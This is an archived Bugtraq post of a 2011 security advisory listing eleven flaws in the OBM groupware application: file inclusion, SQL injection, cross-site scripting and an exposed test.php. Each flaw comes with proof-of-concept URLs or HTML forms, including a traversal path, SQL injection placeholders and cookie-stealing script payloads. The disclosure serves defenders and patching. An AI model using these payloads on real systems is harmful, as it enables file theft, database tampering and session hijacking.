lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 21 Dec 2011 14:31:46 +0100 (CET)
From: advisory@...ridge.ch
To: bugtraq@...urityfocus.com
Subject: Multiple vulnerabilities in OBM

Vulnerability ID: HTB23060
Reference: https://www.htbridge.ch/advisory/multiple_vulnerabilities_in_obm.html
Product: OBM
Vendor: obm.org ( http://obm.org ) 
Vulnerable Version: 2.4.0-rc13 and probably prior
Tested Version: 2.4.0-rc13
Vendor Notification: 30 November 2011 
Vulnerability Type: XSS, SQL Injection, Local File Inclusion, Information Disclosure
Risk level: High 
Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.ch/advisory/ ) 

Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in OBM, which can be exploited to perform information disclosure, cross-site scripting, local file inclusion and SQL injection attacks.

1) Input passed via the "module" GET parameter to /exportcsv/exportcsv_index.php is not properly verified before being used to include files. 
This can be exploited to include local files via directory traversal sequences.

The following PoC is available:

http://[host]/exportcsv/exportcsv_index.php?action=export_page&module=../../../../tmp/file

Successful exploitation of this vulnerability requires attacker to be registered and logged-in.

2) Input passed via the "sel_domain_id" POST parameter to /obm.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

The following PoC code is available:


<form action="http://[host]/obm.php" method="post">
<input type="hidden" name="login" value="">
<input type="hidden" name="password" value="">
<input type="hidden" name="sel_domain_id" value="' SQL_CODE_HERE">
<input type="submit" value="submit" id="btn"> 
</form>


Successful exploitation of this vulnerability requires that "magic_quotes_gpc" is disabled.

3) Input passed via the "lang", "theme" GET parameters to /settings/settings_index.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

The following PoC code is available:

http://[host]/settings/settings_index.php?lang=%27%20SQL_CODE_HERE
http://obm/settings/settings_index.php?theme=%27%20SQL_CODE_HERE

Successful exploitation of this vulnerability requires attacker to be registered and logged-in, as well as "magic_quotes_gpc" to be disabled. 

4) Input passed via the "tf_user" GET parameter to /group/group_index.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

The following PoC code is available:

http://[host]/group/group_index.php?action=search&popup=&sel_privacy=_ALL_&submit=Find&tf_user=%27%20SQL_CODE_HERE

Successful exploitation of this vulnerability requires attacker to be registered and logged-in, as well as "magic_quotes_gpc" to be disabled. 

5) Input passed via the "tf_delegation", "tf_ip", "tf_name" GET parameters to /host/host_index.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

The following PoC code is available:

http://[host]/host/host_index.php?action=search&cb_backup_ftp=1&cb_imap=1&cb_imap_frontend=1&cb_monitor=1&cb_obm_sync=1&cb_smtp_in=1&cb_smtp_out=1&cb_solr=1&popup=&submit=Find&tf_delegation=%27%20SQL_CODE_HERE&tf_ip=&tf_name=
http://[host]/host/host_index.php?action=search&cb_backup_ftp=1&cb_imap=1&cb_imap_frontend=1&cb_monitor=1&cb_obm_sync=1&cb_smtp_in=1&cb_smtp_out=1&cb_solr=1&popup=&submit=Find&tf_delegation=&tf_ip=%27%20SQL_CODE_HERE&tf_name=
http://[host]/host/host_index.php?action=search&cb_backup_ftp=1&cb_imap=1&cb_imap_frontend=1&cb_monitor=1&cb_obm_sync=1&cb_smtp_in=1&cb_smtp_out=1&cb_solr=1&popup=&submit=Find&tf_delegation=&tf_ip=&tf_name=%27%20SQL_CODE_HERE

Successful exploitation of this vulnerabilities requires attacker to be registered and logged-in, as well as "magic_quotes_gpc" to be disabled. 

6) Input passed via the "action" GET parameter to obm.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

The following PoC code is available:

http://[host]/obm.php?action=%27%20SQL_CODE_HERE

Successful exploitation of this vulnerability requires attacker to be registered and logged-in, as well as "magic_quotes_gpc" to be disabled. 

7) Input passed via the "cal_alert", "cal_first_hour", "cal_interval", "cal_last_hour", "commentorder", "csv_sep", "date", "date_upd", "debug_exe", "debug_id", "debug_param", "debug_sess", "debug_solr", "debug_sql", "dsrc", "menu", "rows", "sel_display_days", "timeformat", "timezone", "todo" GET parameters to /settings/settings_index.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

The following PoC code is available:

http://[host]/settings/settings_index.php?cal_alert=%27%20SQL_CODE_HERE&cal_first_hour=0&cal_interval=4&cal_last_hour=1&commentorder=0&csv_sep=%3b&date=Y-m-d&date_upd=Y-m-d&debug_exe=16&debug_id=1&debug_param=2&debug_sess=4&debug_solr=32&debug_sql=8&display=yes&dsrc=0&form_user_pref=1&mail=yes&mail_participation=yes&menu=text&public_fb=yes&rows=10&sel_display_days=1111111&submit=Validate&timeformat=12H&timezone=Africa%2fAbidjan&todo=todo_priority

Successful exploitation of this vulnerabilities requires attacker to be registered and logged-in, as well as "magic_quotes_gpc" to be disabled. 

8) Input passed via the "tf_delegation", "tf_ip", "tf_name" GET parameters to /host/host_index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.

The following PoC code is available:

http://[host]/host/host_index.php?action=search&cb_backup_ftp=1&cb_imap=1&cb_imap_frontend=1&cb_monitor=1&cb_obm_sync=1&cb_smtp_in=1&cb_smtp_out=1&cb_solr=1&popup=&submit=Find&tf_delegation=%22%20onmouseover=alert%28document.cookie%29;%22&tf_ip=&tf_name=
http://[host]/host/host_index.php?action=search&cb_backup_ftp=1&cb_imap=1&cb_imap_frontend=1&cb_monitor=1&cb_obm_sync=1&cb_smtp_in=1&cb_smtp_out=1&cb_solr=1&popup=&submit=Find&tf_delegation=&tf_ip=%22%20onmouseover=alert%28document.cookie%29;%22&tf_name=
http://[host]/host/host_index.php?action=search&cb_backup_ftp=1&cb_imap=1&cb_imap_frontend=1&cb_monitor=1&cb_obm_sync=1&cb_smtp_in=1&cb_smtp_out=1&cb_solr=1&popup=&submit=Find&tf_delegation=&tf_ip=&tf_name=%22%20onmouseover=alert%28document.cookie%29;%22

9) Input passed via the "login" POST parameter to /obm.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.


<form action="http://[host]/obm.php" method="post">
<input type="hidden" name="login" value='" onmouseover=alert(document.cookie) "'>
<input type="hidden" name="password" value="">
<input type="hidden" name="sel_domain_id" value="">
<input type="submit" value="submit" id="btn"> 
</form>


10) Input passed via the "tf_user" GET parameter to /group/group_index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.

The following PoC code is available:

http://[host]/group/group_index.php?action=search&popup=&sel_privacy=_ALL_&submit=Find&tf_user=%22%20onmouseover=alert%28document.cookie%29;%22

11) The "test.php" script is stored with insecure permissions inside of the web root. 
This can be exploited to get potentially sensitive information (e.g. PHP configuration details) by calling the file directly. 

The following PoC code is available:

http://[host]/test.php

Disclaimer: Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on the web page in Reference field.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ